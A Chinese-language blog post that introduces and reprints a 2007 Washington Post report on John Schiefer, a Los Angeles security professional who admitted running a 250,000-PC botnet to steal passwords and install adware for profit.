John Schiefer,26岁,来自美国洛杉矶,网名是“”acid” 或 “acidstorm”。
前不久,他向机关和媒体承认运行了超过25万计算机组成的僵尸网。他通过两个IRC的聊天室”#bottalk” and“#rizon,”来控制他的庞大僵尸网,用以盗窃用户的帐号、口令、信用卡号等。John声称他主要使用AIM的漏洞来扩张他的僵尸网,发送链接给目标用户群,诱骗他们点击,点击后botware或trojan木马就下载到了他们的计算机上,潜伏下来。
先前John曾在洛杉矶的Internet电话公司 – 3G Comm工作,主要是为公司的商业客户提供安全保护。由于John的特殊身份,这则报导带来了大量的讨论,职业安全顾问们值得信任吗?他们都在做什么?
亚洲电信的报导:
http://www.networksasia.net/article.php?type=article&id_article=2425
另外的报导来自华盛顿邮报:
http://blog.washingtonpost.com/securityfix/2007/11/security_pro_admits_to_hijacki.html?nav=rss_blog
Security Pro Admits to Hijacking PCs for Profit
A Los Angeles security professional has admitted to infecting morethan a quarter million computers with malicious software and installingspyware that was used to steal personal data and serve victims withonline advertisements.
John Kenneth Schiefer, 26, variously known online as “acid” and“acidstorm,” agreed to plead guilty to at least four felony charges offraud and wiretapping, charges punishable by $1.75 million in fines andnearly 60 years in prison.
Investigators say Schiefer and two minors — identified in thecomplaint only by their online screen names “pr1me” and “dynamic” —broke into about 250,000 PCs. On at least 137,000 of those infectedsystems, Schiefer and his cohorts installed programs that allowed themto control the machines remotely. The malicious “bot” programs alsoallowed the attackers to steal any user names and passwords thatvictims had saved in Internet Explorer.
Schiefer is thought to be the first in the United States to beaccused of violating federal wiretapping laws by operating a “botnet” —the term for a large grouping of hacked, remotely controlled computers— according to Mark Krause, an assistant U.S. attorney in Los Angeles.
In an exclusive interview with Security Fix, Schiefer said he’s beenexperimenting with computers and writing software in one form oranother since 1991, when he first discovered Internet relay chat(IRC),a vast sea of text-based communications networks that predatesinstant-messaging software. There are tens of thousands of IRC channelsall over the world catering to almost every imaginable audience orinterest, including quite a few frequented exclusively by hackers,virus writers and loose-knit criminal groups. IRC channels havetraditionally been among the most popular means of controlling botnets.
For the past several years, Schiefer has acted as an administratorfor “#bottalk” and “#rizon,” two of the more active hacker chat roomson IRC, where the discussion ranges from pop culture to methods forimproving the latest bot programs and identifying which Web sites mostrecently got hacked.
Schiefer said he and his friends spread the bot programs mainly overAOL Instant Messenger (AIM). By using malicious “spreader” programssuch as Niteaim and AIM Exploiter, Schiefer and his co-conspiratorsspammed out messages inviting recipients to click on a link. Anyone whotook the bait had a “Trojan horse” program downloaded to their machine,an invader that then tried to fetch the malicious bot program.
Schiefer admits he and friends used several hjacked PayPal accountsto purchase Web hosting that helped facilitate the spreading of theirbot programs.
Schiefer’s employer — Los Angeles-based Internet telephony provider3G Communications — let him go in March 2006 after he filed a series ofdisability claims. His job at the time was to help securecommunications networks for businesses.
Schiefer claims that he stopped all of the malicious activity in early January 2006.
“Ever since then, I’ve been more trying to create a positive thingand trying to prevent crap like this happening,” he said. “I kind ofsaw the error of my ways and decided I’d had enough.”
Later that month, federal agents raided his home, seizing computer equipment and other evidence.
Schiefer also said he had installed adware on machines he and hisfriends controlled, making a 20 cent commission each time theyinstalled a piece of software from TopConverting, a now defunct adwarecompany formerly owned by Simpel Internet, a marketing company based inthe Netherlands.
Schiefer acknowledged that in mid-2005, he made more than $19,000 incommissions from TopConverting by installing to hijacked computers. Thegovernment claims he made the money installing adware over a period ofa month in June 2005. Schiefer said he earned that sum in less than oneweek’s time.
Schiefer admitted that he spent most of that week’s earnings thefollowing month entertaining himself and friends at DefCon, a massivehacker and security research conference held annually in Las Vegas.
Interestingly, I featured TopConverting in a February 2006 story Iwrote for The Washington Post Magazine, which chronicled the exploitsof “0×80,” a hacker who — like Schiefer — made thousands of dollars amonth installing adware on machines he had seeded with bot programs.
From that story: “Majy says TopConverting, which did not respond torequests for comment for this article, paid him an average of $2,400every two weeks for installing its programs. He got 20 cents perinstall for computers in the United States and five cents per installfor PCs in 16 other countries, including France, Germany and the UnitedKingdom. A nickel per install doesn’t sound like much, unless youcontrol a botnet of tens of thousands of computers.”
According to an FBI informant who asked not to be named, Schieferwas a member of Defonic, a hacker group that included the individualsidentified in the paragraph above as Zach “Majy” Mann, as well as“0×80″. Another member of Defonic — Cameron “cam0″ LaCroix — earned hisreputation after breaking into Paris Hilton’s cell phone account andlater leading the group in breaching data giant LexisNexis, a stunt inwhich cam0 and several others pulled sensitive records on more than310,000 people, including a number of Hollywood celebrities.
Most former members of the Defonic crew are now either in jail or have only recently been released from prison.
Schiefer said he regrets his actions, and hopes that the cooperationhe has shown with law enforcement in the case so far will lighten hissentence.
“I don’t think anyone should feel sorry for me,” Schiefer said. “What I was doing was wrong [and] stupid, and I got caught.”